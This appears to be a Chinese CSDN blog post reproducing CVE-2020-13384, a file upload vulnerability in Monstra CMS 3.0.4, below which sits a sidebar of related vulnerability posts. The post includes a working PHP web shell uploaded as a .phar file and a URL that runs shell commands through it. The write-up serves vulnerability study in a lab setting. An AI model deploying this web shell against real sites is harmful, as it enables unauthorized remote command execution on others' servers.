monstra 文件上传(CVE-2020-13384)

最新推荐文章于 2024-02-23 16:44:21 发布
最新推荐文章于 2024-02-23 16:44:21 发布
阅读量619 收藏 12
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135333626
版权

漏洞描述:

Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。

该程序不允许’html’, ‘htm’, ‘js’, ‘jsb’, ‘mhtml’, ‘mht’, ‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘phps’,‘shtml’, ‘jhtml’, ‘pl’, ‘py’, ‘cgi’, ‘sh’, ‘ksh’, ‘bsh’, ‘c’, ‘htaccess’, ‘htpasswd’,‘exe’, ‘scr’, ‘dll’, ‘msi’, ‘vbs’, ‘bat’, ‘com’, ‘pif’, ‘cmd’, ‘vxd’, ‘cpl’,'empty’后缀的文件上传。

复现过程:

1.访问ip:port

2.进行注册,随意填写就好

3.注册成功,点击登录

4.跳转到登录页面,随意注册

5.输入注册的用户名密码登录

6.编写test.phar文件

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

7.上传文件

8.访问我们上传木马文件并执行命令

http://ip:port/public/uploads/test.phar?cmd=ls%20/

修复建议:

参考

https://www.exploit-db.com/exploits/48479

https://xz.aliyun.com/t/7850

慕筱蚺
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
monstra 文件上传CVE-2020-13384
qq_32445755的博客
06-07 647
Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。 Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。 该程序不允许’html’, ‘htm’, ‘js’, ‘jsb’, ‘mhtml’, ‘mht’, ‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘phps’,‘shtml’, ‘jhtml’, ‘pl’, ‘py’, ‘cgi’, ‘sh’, ‘ksh
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13384monstra 文件上传
Foreverlove112的博客
10-01 1752
CVE-2020-13384monstra 文件上传
【漏洞复现-monstra-文件上传】vulfocus/monstra_cve_2020_13384
10-10 1354
monstra-文件上传】后缀的理解
CMS-CVE
最新发布
qq_49714982的博客
02-23 413
WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0。WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0。WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0。WSO2 API Manager 2.2.0 及更高版本到 4.0.0。影响范围:jQuery Upload File
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-1938.zip
04-15
CVE-2020-1938:Apache Tomcat AJP协议远程代码执行漏洞】 CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞,该漏洞允许攻击者通过AJP(Apache JServ Protocol)接口来实现远程代码执行,从而对目标系统...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
Vulfocus 入门+初级
大雾
05-20 3541
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
Monstra CMS文件上传(vulfocus/monstra_cve_2020_13384的writeup)
sGanYu
05-04 2423
环境:Vulfocus 漏洞威胁分析平台 writeup 开启环境 随意注册一个用户,如果说记性不好的话(bushiwo)可以把账户名密码都设置为admin,邮箱随意 直奔主题 漏洞路径:http://123.58.236.76:48412/admin/ ,如果是和我一样注册的话,这里用户名和密码都是admin 点击上传文件 第一步,上传所需文件,第二步,抓包 注意:程序不允许'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'p.
typesetter 文件上传CVE-2020-25790)
小小猪的博客
12-30 800
typesetter 文件上传CVE-2020-25790) 漏洞简介: Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 环境搭建: 在线环境 地址 漏洞复现: 访问首页 点击logged in 进入登录界面 账号密码: admin admin 创建一句话文件,压缩成压缩包 <?php @eval($...
vulhub漏洞复现-Apache Flink(CVE-2020-17518 CVE-2020-17519)任意文件上传/读取
遇事不决冲冲冲
11-01 3715
Apache Flink Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但同时也可以作为独立集群运行。 CVE-2020-17518 思路 Apache Flink 控制面板的Submit New Job处存在任意文件上传,利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置 漏洞复现 上传后抓包 进入后台查看 CV
2020-11-11
wo_year的博客
11-11 123
初次写博客 打工人
Dolibarr 文件上传漏洞(CVE-2020-14209)
玄道的网安博客
12-18 813
简介 Dolibarr ERP&CRM是一个现代软件包,可帮助管理组织的活动(联系人,供应商,发票,订单,库存,议程等)。 这是一个开放源代码软件套件(用PHP编写,具有可选的JavaScript增强功能),适合中小型或大型公司,基金会和自由职业者使用。 漏洞概述 该漏洞允许低权权用户上传危险文件,从而导致任意代码执行。 影响版本 Dolibarr 11.0.5之前版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/Dolibarr/dolibarr
vulfocus 靶机环境搭建部署
热门推荐
csd_ct的专栏
11-05 2万+
vulfocus 本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用的是docker环境部署安装,使用起来方便,可作为一个优秀靶场环境,提升实战能力。可本地部署安装,也可以直接使用线上环境vulfocus (fofa.so)http://vulfocus.fofa.so/#/login?redirect=%2Fdashboard 类似的漏洞集成环境,如vulhub也是一个不错的实验环境,不过vulfocus的漏洞都比较新,但数量少,vulhub收集的漏洞个数较多,但大多...
Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest
qq_34341458的博客
04-11 4059
0x01 描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 0x02 靶场地址 靶场地址:http://v
CVE-2020-13384
09-13
CVE-2020-13384是一个与monstra文件上传相关的漏洞。根据引用中提供的信息,该漏洞的描述、影响范围、漏洞复现和漏洞修复方法如下: 0x01 漏洞描述: CVE-2020-13384monstra文件上传功能中存在的漏洞。该漏洞可能导致攻击者能够上传恶意文件到服务器上,并在服务器上执行任意代码。 0x02 影响范围: 该漏洞影响的是monstra版本。目前没有提供具体受影响版本的信息。 0x03 漏洞复现: 根据引用中提供的参考链接,可以找到漏洞的详细复现方法。在此处我无法提供具体的复现步骤,请参考给出的参考链接。 0x04 漏洞修复: 关于CVE-2020-13384的漏洞修复方法,由于我无法直接访问到引用中的参考链接内容,请参考引用中提供的参考链接获取详细的修复方法。根据经验,常见的漏洞修复方法可能包括升级软件版本、应用补丁或者禁用受影响的功能等。 请注意,以上提供的信息仅供参考,请确保遵循官方渠道发布的漏洞公告和建议来确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值